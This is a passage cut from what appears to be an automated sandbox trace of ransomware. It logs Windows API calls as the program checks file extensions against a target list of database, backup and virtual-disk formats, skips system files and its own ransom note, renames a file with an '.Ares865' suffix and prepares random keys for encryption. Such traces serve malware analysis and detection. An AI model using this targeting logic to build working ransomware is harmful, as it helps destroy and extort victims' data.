lpString2="pan") returned 1 [0069.331] lstrlenW (lpString="pdb") returned 3 [0069.331] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0069.331] lstrlenW (lpString="pdm") returned 3 [0069.331] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0069.331] lstrlenW (lpString="pnz") returned 3 [0069.331] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0069.337] lstrlenW (lpString="qry") returned 3 [0069.337] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0069.337] lstrlenW (lpString="qvd") returned 3 [0069.337] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0069.337] lstrlenW (lpString="rbf") returned 3 [0069.337] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0069.337] lstrlenW (lpString="rctd") returned 4 [0069.338] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0069.341] lstrlenW (lpString="rod") returned 3 [0069.343] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0069.343] lstrlenW (lpString="rodx") returned 4 [0069.346] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0069.346] lstrlenW (lpString="rpd") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0069.347] lstrlenW (lpString="rsd") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0069.347] lstrlenW (lpString="sas7bdat") returned 8 [0069.347] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0069.347] lstrlenW (lpString="sbf") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0069.347] lstrlenW (lpString="scx") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0069.347] lstrlenW (lpString="sdb") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0069.347] lstrlenW (lpString="sdc") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0069.347] lstrlenW (lpString="sdf") returned 3 [0069.347] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0069.347] lstrlenW (lpString="sis") returned 3 [0069.348] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0069.348] lstrlenW (lpString="spq") returned 3 [0069.348] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0069.348] lstrlenW (lpString="te") returned 2 [0069.348] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0069.348] lstrlenW (lpString="teacher") returned 7 [0069.348] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0069.348] lstrlenW (lpString="tmd") returned 3 [0069.348] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0069.348] lstrlenW (lpString="tps") returned 3 [0069.348] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0069.349] lstrlenW (lpString="trc") returned 3 [0069.349] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0069.350] lstrlenW (lpString="trc") returned 3 [0069.350] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0069.351] lstrlenW (lpString="trm") returned 3 [0069.362] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0069.362] lstrlenW (lpString="udb") returned 3 [0069.367] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0069.368] lstrlenW (lpString="udl") returned 3 [0069.369] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0069.369] lstrlenW (lpString="usr") returned 3 [0069.370] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0069.370] lstrlenW (lpString="v12") returned 3 [0069.371] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0069.372] lstrlenW (lpString="vis") returned 3 [0069.372] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0069.374] lstrlenW (lpString="vpd") returned 3 [0069.375] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0069.376] lstrlenW (lpString="vvv") returned 3 [0069.376] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0069.377] lstrlenW (lpString="wdb") returned 3 [0069.377] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0069.398] lstrlenW (lpString="wmdb") returned 4 [0069.398] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0069.398] lstrlenW (lpString="wrk") returned 3 [0069.398] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0069.398] lstrlenW (lpString="xdb") returned 3 [0069.398] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0069.398] lstrlenW (lpString="xld") returned 3 [0069.398] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0069.398] lstrlenW (lpString="xmlff") returned 5 [0069.398] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0069.398] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.Ares865") returned 89 [0069.399] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0069.417] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0069.423] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=766) returned 1 [0069.423] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0069.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0069.424] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0069.424] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0069.479] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0069.479] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.479] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600, lpName=0x0) returned 0x154 [0069.481] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x600) returned 0x190000 [0069.514] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0069.515] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0069.515] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0069.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0069.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0069.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0069.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0069.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0069.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0069.516] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0069.516] CloseHandle (hObject=0x154) returned 1 [0069.516] CloseHandle (hObject=0x120) returned 1 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0069.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0069.523] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93c9960, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xedfa2720, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0xbee30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="aoldtz.exe") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="..") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="windows") returned -1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="bootmgr") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="temp") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="pagefile.sys") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="boot") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="ids.txt") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="ntuser.dat") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="perflogs") returned 1 [0069.523] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2="MSBuild") returned 1 [0069.524] lstrlenW (lpString="VC_redist.x86.exe") returned 17 [0069.524] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0069.524] lstrcpyW (in: lpString1=0x2cce490, lpString2="VC_redist.x86.exe" | out: lpString1="VC_redist.x86.exe") returned="VC_redist.x86.exe" [0069.524] lstrlenW (lpString="VC_redist.x86.exe") returned 17 [0069.524] lstrlenW (lpString="Ares865") returned 7 [0069.524] lstrcmpiW (lpString1="x86.exe", lpString2="Ares865") returned 1 [0069.524] lstrlenW (lpString=".dll") returned 4 [0069.524] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".dll") returned 1 [0069.524] lstrlenW (lpString=".lnk") returned 4 [0069.524] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".lnk") returned 1 [0069.524] lstrlenW (lpString=".ini") returned 4 [0069.524] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".ini") returned 1 [0069.524] lstrlenW (lpString=".sys") returned 4 [0069.524] lstrcmpiW (lpString1="VC_redist.x86.exe", lpString2=".sys") returned 1 [0069.524] lstrlenW (lpString="VC_redist.x86.exe") returned 17 [0069.524] lstrlenW (lpString="bak") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0069.524] lstrlenW (lpString="ba_") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0069.524] lstrlenW (lpString="dbb") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0069.524] lstrlenW (lpString="vmdk") returned 4 [0069.524] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0069.524] lstrlenW (lpString="rar") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0069.524] lstrlenW (lpString="zip") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0069.524] lstrlenW (lpString="tgz") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0069.524] lstrlenW (lpString="vbox") returned 4 [0069.524] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0069.524] lstrlenW (lpString="vdi") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0069.524] lstrlenW (lpString="vhd") returned 3 [0069.524] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0069.524] lstrlenW (lpString="vhdx") returned 4 [0069.524] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0069.524] lstrlenW (lpString="avhd") returned 4 [0069.524] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0069.525] lstrlenW (lpString="db") returned 2 [0069.525] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0069.525] lstrlenW (lpString="db2") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0069.525] lstrlenW (lpString="db3") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0069.525] lstrlenW (lpString="dbf") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0069.525] lstrlenW (lpString="mdf") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0069.525] lstrlenW (lpString="mdb") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0069.525] lstrlenW (lpString="sql") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0069.525] lstrlenW (lpString="sqlite") returned 6 [0069.525] lstrcmpiW (lpString1="86.exe", lpString2="sqlite") returned -1 [0069.525] lstrlenW (lpString="sqlite3") returned 7 [0069.525] lstrcmpiW (lpString1="x86.exe", lpString2="sqlite3") returned 1 [0069.525] lstrlenW (lpString="sqlitedb") returned 8 [0069.525] lstrcmpiW (lpString1=".x86.exe", lpString2="sqlitedb") returned -1 [0069.525] lstrlenW (lpString="xml") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0069.525] lstrlenW (lpString="$er") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0069.525] lstrlenW (lpString="4dd") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0069.525] lstrlenW (lpString="4dl") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0069.525] lstrlenW (lpString="^^^") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0069.525] lstrlenW (lpString="abs") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0069.525] lstrlenW (lpString="abx") returned 3 [0069.525] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0069.525] lstrlenW (lpString="accdb") returned 5 [0069.525] lstrcmpiW (lpString1="6.exe", lpString2="accdb") returned -1 [0069.525] lstrlenW (lpString="accdc") returned 5 [0069.525] lstrcmpiW (lpString1="6.exe", lpString2="accdc") returned -1 [0069.525] lstrlenW (lpString="accde") returned 5 [0069.526] lstrcmpiW (lpString1="6.exe", lpString2="accde") returned -1 [0069.526] lstrlenW (lpString="accdr") returned 5 [0069.526] lstrcmpiW (lpString1="6.exe", lpString2="accdr") returned -1 [0069.526] lstrlenW (lpString="accdt") returned 5 [0069.526] lstrcmpiW (lpString1="6.exe", lpString2="accdt") returned -1 [0069.526] lstrlenW (lpString="accdw") returned 5 [0069.526] lstrcmpiW (lpString1="6.exe", lpString2="accdw") returned -1 [0069.526] lstrlenW (lpString="accft") returned 5 [0069.526] lstrcmpiW (lpString1="6.exe", lpString2="accft") returned -1 [0069.526] lstrlenW (lpString="adb") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0069.526] lstrlenW (lpString="adb") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0069.526] lstrlenW (lpString="ade") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0069.526] lstrlenW (lpString="adf") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0069.526] lstrlenW (lpString="adn") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0069.526] lstrlenW (lpString="adp") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0069.526] lstrlenW (lpString="alf") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0069.526] lstrlenW (lpString="ask") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0069.526] lstrlenW (lpString="btr") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0069.526] lstrlenW (lpString="cat") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0069.526] lstrlenW (lpString="cdb") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0069.526] lstrlenW (lpString="ckp") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0069.526] lstrlenW (lpString="cma") returned 3 [0069.526] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0069.526] lstrlenW (lpString="cpd") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0069.527] lstrlenW (lpString="dacpac") returned 6 [0069.527] lstrcmpiW (lpString1="86.exe", lpString2="dacpac") returned -1 [0069.527] lstrlenW (lpString="dad") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0069.527] lstrlenW (lpString="dadiagrams") returned 10 [0069.527] lstrcmpiW (lpString1="st.x86.exe", lpString2="dadiagrams") returned 1 [0069.527] lstrlenW (lpString="daschema") returned 8 [0069.527] lstrcmpiW (lpString1=".x86.exe", lpString2="daschema") returned -1 [0069.527] lstrlenW (lpString="db-journal") returned 10 [0069.527] lstrcmpiW (lpString1="st.x86.exe", lpString2="db-journal") returned 1 [0069.527] lstrlenW (lpString="db-shm") returned 6 [0069.527] lstrcmpiW (lpString1="86.exe", lpString2="db-shm") returned -1 [0069.527] lstrlenW (lpString="db-wal") returned 6 [0069.527] lstrcmpiW (lpString1="86.exe", lpString2="db-wal") returned -1 [0069.527] lstrlenW (lpString="dbc") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0069.527] lstrlenW (lpString="dbs") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0069.527] lstrlenW (lpString="dbt") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0069.527] lstrlenW (lpString="dbv") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0069.527] lstrlenW (lpString="dbx") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0069.527] lstrlenW (lpString="dcb") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0069.527] lstrlenW (lpString="dct") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dct") returned 1 [0069.527] lstrlenW (lpString="dcx") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dcx") returned 1 [0069.527] lstrlenW (lpString="ddl") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="ddl") returned 1 [0069.527] lstrlenW (lpString="dlis") returned 4 [0069.527] lstrcmpiW (lpString1=".exe", lpString2="dlis") returned -1 [0069.527] lstrlenW (lpString="dp1") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dp1") returned 1 [0069.527] lstrlenW (lpString="dqy") returned 3 [0069.527] lstrcmpiW (lpString1="exe", lpString2="dqy") returned 1 [0069.528] lstrlenW (lpString="dsk") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="dsk") returned 1 [0069.528] lstrlenW (lpString="dsn") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="dsn") returned 1 [0069.528] lstrlenW (lpString="dtsx") returned 4 [0069.528] lstrcmpiW (lpString1=".exe", lpString2="dtsx") returned -1 [0069.528] lstrlenW (lpString="dxl") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="dxl") returned 1 [0069.528] lstrlenW (lpString="eco") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="eco") returned 1 [0069.528] lstrlenW (lpString="ecx") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="ecx") returned 1 [0069.528] lstrlenW (lpString="edb") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="edb") returned 1 [0069.528] lstrlenW (lpString="epim") returned 4 [0069.528] lstrcmpiW (lpString1=".exe", lpString2="epim") returned -1 [0069.528] lstrlenW (lpString="fcd") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fcd") returned -1 [0069.528] lstrlenW (lpString="fdb") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fdb") returned -1 [0069.528] lstrlenW (lpString="fic") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fic") returned -1 [0069.528] lstrlenW (lpString="flexolibrary") returned 12 [0069.528] lstrcmpiW (lpString1="dist.x86.exe", lpString2="flexolibrary") returned -1 [0069.528] lstrlenW (lpString="fm5") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fm5") returned -1 [0069.528] lstrlenW (lpString="fmp") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fmp") returned -1 [0069.528] lstrlenW (lpString="fmp12") returned 5 [0069.528] lstrcmpiW (lpString1="6.exe", lpString2="fmp12") returned -1 [0069.528] lstrlenW (lpString="fmpsl") returned 5 [0069.528] lstrcmpiW (lpString1="6.exe", lpString2="fmpsl") returned -1 [0069.528] lstrlenW (lpString="fol") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fol") returned -1 [0069.528] lstrlenW (lpString="fp3") returned 3 [0069.528] lstrcmpiW (lpString1="exe", lpString2="fp3") returned -1 [0069.529] lstrlenW (lpString="fp4") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="fp4") returned -1 [0069.529] lstrlenW (lpString="fp5") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="fp5") returned -1 [0069.529] lstrlenW (lpString="fp7") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="fp7") returned -1 [0069.529] lstrlenW (lpString="fpt") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="fpt") returned -1 [0069.529] lstrlenW (lpString="frm") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="frm") returned -1 [0069.529] lstrlenW (lpString="gdb") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0069.529] lstrlenW (lpString="gdb") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0069.529] lstrlenW (lpString="grdb") returned 4 [0069.529] lstrcmpiW (lpString1=".exe", lpString2="grdb") returned -1 [0069.529] lstrlenW (lpString="gwi") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="gwi") returned -1 [0069.529] lstrlenW (lpString="hdb") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="hdb") returned -1 [0069.529] lstrlenW (lpString="his") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="his") returned -1 [0069.529] lstrlenW (lpString="ib") returned 2 [0069.529] lstrcmpiW (lpString1="xe", lpString2="ib") returned 1 [0069.529] lstrlenW (lpString="idb") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="idb") returned -1 [0069.529] lstrlenW (lpString="ihx") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="ihx") returned -1 [0069.529] lstrlenW (lpString="itdb") returned 4 [0069.529] lstrcmpiW (lpString1=".exe", lpString2="itdb") returned -1 [0069.529] lstrlenW (lpString="itw") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="itw") returned -1 [0069.529] lstrlenW (lpString="jet") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="jet") returned -1 [0069.529] lstrlenW (lpString="jtx") returned 3 [0069.529] lstrcmpiW (lpString1="exe", lpString2="jtx") returned -1 [0069.530] lstrlenW (lpString="kdb") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="kdb") returned -1 [0069.530] lstrlenW (lpString="kexi") returned 4 [0069.530] lstrcmpiW (lpString1=".exe", lpString2="kexi") returned -1 [0069.530] lstrlenW (lpString="kexic") returned 5 [0069.530] lstrcmpiW (lpString1="6.exe", lpString2="kexic") returned -1 [0069.530] lstrlenW (lpString="kexis") returned 5 [0069.530] lstrcmpiW (lpString1="6.exe", lpString2="kexis") returned -1 [0069.530] lstrlenW (lpString="lgc") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="lgc") returned -1 [0069.530] lstrlenW (lpString="lwx") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="lwx") returned -1 [0069.530] lstrlenW (lpString="maf") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="maf") returned -1 [0069.530] lstrlenW (lpString="maq") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="maq") returned -1 [0069.530] lstrlenW (lpString="mar") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mar") returned -1 [0069.530] lstrlenW (lpString="marshal") returned 7 [0069.530] lstrcmpiW (lpString1="x86.exe", lpString2="marshal") returned 1 [0069.530] lstrlenW (lpString="mas") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mas") returned -1 [0069.530] lstrlenW (lpString="mav") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mav") returned -1 [0069.530] lstrlenW (lpString="maw") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="maw") returned -1 [0069.530] lstrlenW (lpString="mdbhtml") returned 7 [0069.530] lstrcmpiW (lpString1="x86.exe", lpString2="mdbhtml") returned 1 [0069.530] lstrlenW (lpString="mdn") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mdn") returned -1 [0069.530] lstrlenW (lpString="mdt") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mdt") returned -1 [0069.530] lstrlenW (lpString="mfd") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mfd") returned -1 [0069.530] lstrlenW (lpString="mpd") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mpd") returned -1 [0069.530] lstrlenW (lpString="mrg") returned 3 [0069.530] lstrcmpiW (lpString1="exe", lpString2="mrg") returned -1 [0069.531] lstrlenW (lpString="mud") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="mud") returned -1 [0069.531] lstrlenW (lpString="mwb") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="mwb") returned -1 [0069.531] lstrlenW (lpString="myd") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="myd") returned -1 [0069.531] lstrlenW (lpString="ndf") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="ndf") returned -1 [0069.531] lstrlenW (lpString="nnt") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="nnt") returned -1 [0069.531] lstrlenW (lpString="nrmlib") returned 6 [0069.531] lstrcmpiW (lpString1="86.exe", lpString2="nrmlib") returned -1 [0069.531] lstrlenW (lpString="ns2") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="ns2") returned -1 [0069.531] lstrlenW (lpString="ns3") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="ns3") returned -1 [0069.531] lstrlenW (lpString="ns4") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="ns4") returned -1 [0069.531] lstrlenW (lpString="nsf") returned 3 [0069.531] lstrcmpiW (lpString1="exe", lpString2="nsf") returned -1 [0069.531] lstrlenW (lpString="nv") returned 2 